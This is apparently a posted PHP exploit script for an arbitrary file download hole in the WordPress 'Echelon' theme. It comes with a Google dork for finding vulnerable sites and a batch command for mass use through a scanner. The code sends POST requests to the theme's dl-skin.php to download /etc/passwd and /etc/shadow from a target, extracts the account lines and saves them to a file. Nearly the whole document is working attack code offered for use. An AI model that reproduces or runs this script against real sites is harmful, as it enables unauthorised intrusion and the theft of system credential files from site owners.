
[EXPLOIT] Wordpress A.F.D Theme Echelon

Googleinurl Dec 15th, 2014 (edited) 1,215 Never
  1. <?php
  2.  
  3. #===============================================================================
  4. # NAME:         Wordpress A.F.D Theme Echelon
  5. # TYPE:         Arbitrary File Download
  6. # Google DORK:  inurl:/wp-content/themes/echelon
  7. # Vendor:       www.wordpress.org
  8. # Tested on:    Linux
  9. # EXECUTE:      php exploit.php www.alvo.com.br
  10. # OUTPUT:       EXPLOIT_WPAFD_Echelon.txt
  11. # AUTHOR:       Cleiton Pinheiro
  12. # Blog:         http://blog.inurl.com.br
  13. # Twitter:      https://twitter.com/googleinurl
  14. # Fanpage:      https://fb.com/InurlBrasil
  15. # GIT:          https://github.com/googleinurl
  16. # YOUTUBE       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  17. #
  18. #
  19. #------------------------------------------------------------------------------
  20. #  Command for batch use via the INURLBR scanner (one run per dork result):
  21. # ./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
  22. #
  23. #------------------------------------------------------------------------------
  24. # Download Scanner INURLBR:
  25. # https://github.com/googleinurl/SCANNER-INURLBR
  26. #===============================================================================
  27.  
  28. error_reporting(1);
  29. set_time_limit(0);
  30. ini_set('display_errors', 1);
  31. ini_set('max_execution_time', 0);
  32. ini_set('allow_url_fopen', 1);
  33. ob_implicit_flush(true);
  34. ob_end_flush();
  35. print empty($argv[1]) ? exit("0x[ERROR]: DEFINA URL / Execute: php exploit.php www.alvo.com.br\n") : NULL;
  36. $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
  37. $config['line'] = "\n------------------------------------------------------------------------------------------------------------------\n";
  38. $config['alvo'] = $argv[1];
  39. $config['exploit'] = "/wp-content/themes/echelon/lib/scripts/dl-skin.php";
  40.  
  41. function __plus() {
  42.  
  43.     ob_flush();
  44.     flush();
  45. }
  46.  
  47. function __convertUrlQuery($query) {
  48.  
  49.     $queryParts = explode('&', $query);
  50.     $params = array();
  51.     foreach ($queryParts as $param) {
  52.         $item = explode('=', $param);
  53.         $params[$item[0]] = urlencode($item[1]);
  54.     }
  55.  
  56.     return $params;
  57. }
  58.  
  59. function __request_info($curl, $config) {
  60.     $postDados = __convertUrlQuery("_mysite_download_skin={$config['file']}&submit=Download");
  61.     foreach ($postDados as $campo => $valor) {
  62.         $postDados_format .= $campo . '=' . ($valor) . '&';
  63.     }
  64.  
  65.     $postDados_format = rtrim($postDados_format, '&');
  66.     curl_setopt($curl, CURLOPT_POST, count($postDados));
  67.     curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format);
  68.     curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']);
  69.     curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31');
  70.     curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] .
  71.             $config['exploit']);
  72.     curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
  73.     curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  74.     curl_setopt($curl, CURLOPT_HEADER, 1);
  75.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  76.     $corpo = curl_exec($curl);
  77.     $server = curl_getinfo($curl);
  78.     $status = NULL;
  79.     preg_match_all('(HTTP.*)', $corpo, $status['http']);
  80.     preg_match_all('(Server:.*)', $corpo, $status['server']);
  81.     preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']);
  82.     $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}"));
  83.     curl_close($curl);
  84.     unset($curl);
  85.     return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE;
  86. }
  87.  
  88. function main($config, $rest) {
  89.  
  90.     __plus();
  91.     print "0x " . date("h:m:s") . " [INFO][EXPLOITATION THE FILE]:{$config['file']}:\n";
  92.     preg_match_all("(root:.*)", $rest['corpo'], $final);
  93.     preg_match_all("(sbin:.*)", $rest['corpo'], $final__);
  94.     preg_match_all("(ftp:.*)", $rest['corpo'], $final___);
  95.     preg_match_all("(nobody:.*)", $rest['corpo'], $final____);
  96.     preg_match_all("(mail:.*)", $rest['corpo'], $final_____);
  97.     $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]);
  98.     $res = NULL;
  99.     if (preg_match("#root#i", $rest['corpo'])) {
  100.         $res.= "0x " . date("h:m:s") . " [INFO][IS VULN][RESUME][VALUES]:\n";
  101.         $res.=$config['line'] . "\n";
  102.         foreach ($_final as $value) {
  103.             $res.="0x " . date("h:m:s") . " [VALUE]: $value\n";
  104.         }
  105.         $res.=$config['line'];
  106.         __plus();
  107.         file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND);
  108.         print "{$res}[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n";
  109.     } else {
  110.  
  111.         print "0x " . date("h:m:s") . " [INFO][NOT VULN]\n";
  112.     }
  113. }
  114.  
  115. print "\r\n0x[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n";
  116. $config['file'] = '/etc/passwd';
  117. $rest = __request_info($objcurl = curl_init(), $config);
  118. __plus();
  119. print $line;
  120. print "0x " . date("h:m:s") . " [INFO]: {$rest['info']}\n";
  121. print "0x " . date("h:m:s") . " [INFO][TARGET]: {$config['alvo']}\n";
  122. main($config, $rest);
  123. __plus();
  124. $config['file'] = '/etc/shadow';
  125. $rest = __request_info($objcurl = curl_init(), $config);
  126. __plus();
  127. main($config, $rest);
  128. __plus();